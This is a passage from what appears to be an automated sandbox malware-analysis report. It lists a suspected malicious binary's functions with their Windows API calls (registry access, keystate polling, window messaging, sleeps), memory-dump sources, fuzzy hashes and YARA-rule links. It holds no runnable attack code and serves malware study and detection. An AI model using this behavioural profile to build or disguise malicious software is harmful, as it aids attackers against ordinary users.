                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 04a871eb120d28f15b0452e2d8721b882e0a66985f5dfafc8af72b699b2923c1
                                                    • Instruction ID: 326b557a11e56c0a4f12d7953fe6f0d304f6c1584cd9d2adf467da3a6d23b7d7
                                                    • Opcode Fuzzy Hash: 04a871eb120d28f15b0452e2d8721b882e0a66985f5dfafc8af72b699b2923c1
                                                    • Instruction Fuzzy Hash: 79815C716407009FD764DF28C886F6BB7E6AF48720F14881DF9999B3D2DA71AC408B95
                                                    Function 006802C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 006810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680388
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006803C7
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0068040E
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0068043A
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00680447
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 9c6f8c601263fbdaa9a7448098a33a33a797215b56b6785e3d307c0b0f1eb2d1
                                                    • Instruction ID: 35f489e07e3efb1ef78168d38752f081c265e3e8ffa21334c5185aca163835be
                                                    • Opcode Fuzzy Hash: 9c6f8c601263fbdaa9a7448098a33a33a797215b56b6785e3d307c0b0f1eb2d1
                                                    • Instruction Fuzzy Hash: 65515D31248205AFD744EF54C891E6FB7EAFF88304F448A2DF595972A2DB30E909CB56
                                                    Function 0066E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0066E88A
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0066E8B3
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0066E8F2
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0066E917
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0066E91F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: e055cb17290e61c4d0c5b41f99700f16a3cfce347d2730d98a32e2cba0a723f0
                                                    • Instruction ID: 6d31f2f017ace4f56821f3f1d1c717cc5eac7c0824392621907b9b6b321ea85c
                                                    • Opcode Fuzzy Hash: e055cb17290e61c4d0c5b41f99700f16a3cfce347d2730d98a32e2cba0a723f0
                                                    • Instruction Fuzzy Hash: 58512035A40205DFCF45DF64C9819AEBBF6EF08310B148099E849AB3A2DB31ED51DF64
                                                    Function 0068A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b869eaf4c0655f454e04403023042a5c4f0902dd8c5dd4244ee2b6e0bd9ac8f0
                                                    • Instruction ID: 75b11a04e2b74b18baa44cd8f6978f50b5ab2cc5436319131ba3fca3fe0a68f2
                                                    • Opcode Fuzzy Hash: b869eaf4c0655f454e04403023042a5c4f0902dd8c5dd4244ee2b6e0bd9ac8f0
                                                    • Instruction Fuzzy Hash: 3B41E035901204ABEB20EFA8CC48FE9BBA6EB09310F140366FD15E72E1D770AD51DB61
                                                    Function 00602344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00602357
                                                    • ScreenToClient.USER32(006C67B0,?), ref: 00602374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: f6a96d44a7275d0800e80908154806a3e686baddafb78d72903a01dbe8f9934c
                                                    • Instruction ID: 29216ad6206d0997822a9bbc1f77a1f4257ceff9a6300533b739434632bca11e
                                                    • Opcode Fuzzy Hash: f6a96d44a7275d0800e80908154806a3e686baddafb78d72903a01dbe8f9934c
                                                    • Instruction Fuzzy Hash: EF415F3550411AFBDF199F68C848AEAFB76FF05324F20435AF829A22D0C7745E94DB91
                                                    Function 00656920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0065695D
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 006569A9
                                                    • TranslateMessage.USER32(?), ref: 006569D2
                                                    • DispatchMessageW.USER32(?), ref: 006569DC
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006569EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    • Opcode ID: c3c5aad947b79f3ba11a1fa762df691613a12c50aa75104ad6a6af92f736b597
                                                    • Instruction ID: 95687f6cccb1b1ef2dce2a5a00ffff9d49ed1b6535afe8ed509aaf39b0cc5b4e
                                                    • Opcode Fuzzy Hash: c3c5aad947b79f3ba11a1fa762df691613a12c50aa75104ad6a6af92f736b597
                                                    • Instruction Fuzzy Hash: B031E331904247AADB20CF74CC44FF6BBAFAB05302F504669F821C32A1E775988DD7A0
                                                    Function 00658F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00658F12
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00658FBC
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00658FC4
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00658FD2
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00658FDA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
                                                    • Instruction ID: 3bb10d82f98f8a2630f414521822441e0005f7fe86cacefecdb233024d594071
                                                    • Opcode Fuzzy Hash: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
                                                    • Instruction Fuzzy Hash: E431AB71500219EFDB14CF68D94CAEE7BB6EB48316F104229FD25EB2D0CBB09958DB90
                                                    Function 0065B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 0065B6C7
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065B6E4
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065B71C
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065B742
                                                    • _wcsstr.LIBCMT ref: 0065B74C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 6d0d1f6fa099f716984a4d03923d18d36bbf7cc8256ed74100d8dad581b011a8
                                                    • Instruction ID: e0e5cd43263129662cf8fbb112fa92e2fc9b767e2a1185181540b70c321ee31f
                                                    • Opcode Fuzzy Hash: 6d0d1f6fa099f716984a4d03923d18d36bbf7cc8256ed74100d8dad581b011a8
                                                    • Instruction Fuzzy Hash: 93210731204254BAEB255B39AC49E7B7BAADF49711F10512DFC05CA2A1EF61CC8197A0
                                                    Function 0068B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068B44C
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0068B471
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0068B489
                                                    • GetSystemMetrics.USER32(00000004), ref: 0068B4B2
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00671184,00000000), ref: 0068B4D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: dad609d438b231b37c1f3af467fba968d8ca05e7cd7fe2e7b1143519aed27426
                                                    • Instruction ID: 4d7cbedb2a6cd7b07e5a2d24738f74c7a0eadb1122ecb29f01252df0423e2794
                                                    • Opcode Fuzzy Hash: dad609d438b231b37c1f3af467fba968d8ca05e7cd7fe2e7b1143519aed27426
                                                    • Instruction Fuzzy Hash: 78218371510255AFCB10AF38DC05ABA3BE6FB05721F145738F926D72E6E7309851DB90
                                                    Function 006597E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00659802
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659834
                                                    • __itow.LIBCMT ref: 0065984C
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659874
                                                    • __itow.LIBCMT ref: 00659885
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID:
                                                    • API String ID: 2983881199-0
                                                    • Opcode ID: 63b29335374f57009b301af805d45710e428480b972d5befd2d229a61b68696d
                                                    • Instruction ID: 99fccc5e867cc09b623a1e40dfc913b2191a787fac3fd67d5cbed67e52ffeaf0
                                                    • Opcode Fuzzy Hash: 63b29335374f57009b301af805d45710e428480b972d5befd2d229a61b68696d
                                                    • Instruction Fuzzy Hash: E521B671A40204FBDF109B65CC86EEE7BABEF4A711F041029FD049B391D6709D8987A1
                                                    Function 006012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                    • SelectObject.GDI32(?,00000000), ref: 0060135C
                                                    • BeginPath.GDI32(?), ref: 00601373
                                                    • SelectObject.GDI32(?,00000000), ref: 0060139C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: d77a09ec1cc279d09f42f5fad32f37339dabfead10419f92dba59929e1b147c4
                                                    • Instruction ID: 1f269fc19bb17e3e2d5a637bc66c1fc88870d1564649cc3d24d6c010e0cc1519
                                                    • Opcode Fuzzy Hash: d77a09ec1cc279d09f42f5fad32f37339dabfead10419f92dba59929e1b147c4
                                                    • Instruction Fuzzy Hash: 23218070941308EFDB189F25DC08BBA7BBBFB01321F149226F810DA2E0D3719991DBA4
                                                    Function 0065C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 21aaca578657897a09d09f1fb57bd45992d09322d0ccd0f31dc3a1bd332f3513
                                                    • Instruction ID: 95aacd2d8abacb092095c043c6406903dcf05df46dddd360a9753229c0820355
                                                    • Opcode Fuzzy Hash: 21aaca578657897a09d09f1fb57bd45992d09322d0ccd0f31dc3a1bd332f3513
                                                    • Instruction Fuzzy Hash: 5701F9B1608B167FDA24A5209C56FAF775F9F213B5F044014FD049A783EA50DE15C6E4
                                                    Function 00664D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00664D5C
                                                    • __beginthreadex.LIBCMT ref: 00664D7A
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00664D8F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00664DA5
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00664DAC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: 9cf155fe2ec6c92112193d6ba702cfd7b1570a37c0427031bbf6eef9f0b97d5f
                                                    • Instruction ID: 1d2c88d8e9ce9bbf0bfcfaeeeb0a315f15fc0b4da6b9f6410242c96bfe694c88
                                                    • Opcode Fuzzy Hash: 9cf155fe2ec6c92112193d6ba702cfd7b1570a37c0427031bbf6eef9f0b97d5f
                                                    • Instruction Fuzzy Hash: 6B1108B2D04204BBC7119BA8DC08EEA7FAEEB85320F144365F915D3350DA758D4087A0
                                                    Function 0065874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658766
                                                    • GetLastError.KERNEL32(?,0065822A,?,?,?), ref: 00658770
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0065822A,?,?,?), ref: 0065877F
                                                    • HeapAlloc.KERNEL32(00000000,?,0065822A,?,?,?), ref: 00658786
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0065879D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
                                                    • Instruction ID: fd4e2256b72a025bdd5cb949af24a262128b224fe5af3034e5fecd0639db60ec
                                                    • Opcode Fuzzy Hash: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
                                                    • Instruction Fuzzy Hash: 61014B71200604FFDB204FA6DC88DAB7BAEFF89756B200669F849D3260DA31CC14CB60
                                                    Function 006654E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665502
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665510
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665518
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665522
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0066555E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 233ba935b62f84acb58c1f2eaa548f1baa6851f3748a3b625126a3685668e409
                                                    • Instruction ID: ef4bd897a46e5c625108a1d70635c6cbd66274b6223462a153292a3262287867
                                                    • Opcode Fuzzy Hash: 233ba935b62f84acb58c1f2eaa548f1baa6851f3748a3b625126a3685668e409
                                                    • Instruction Fuzzy Hash: AF011B35D04A19EBCF00EFE9E88E5EDBB7ABB09711F000596E942F2250DB305654C7A1
                                                    Function 00657652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?,?,0065799D), ref: 0065766F
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 0065768A
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 00657698
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?), ref: 006576A8
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 006576B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
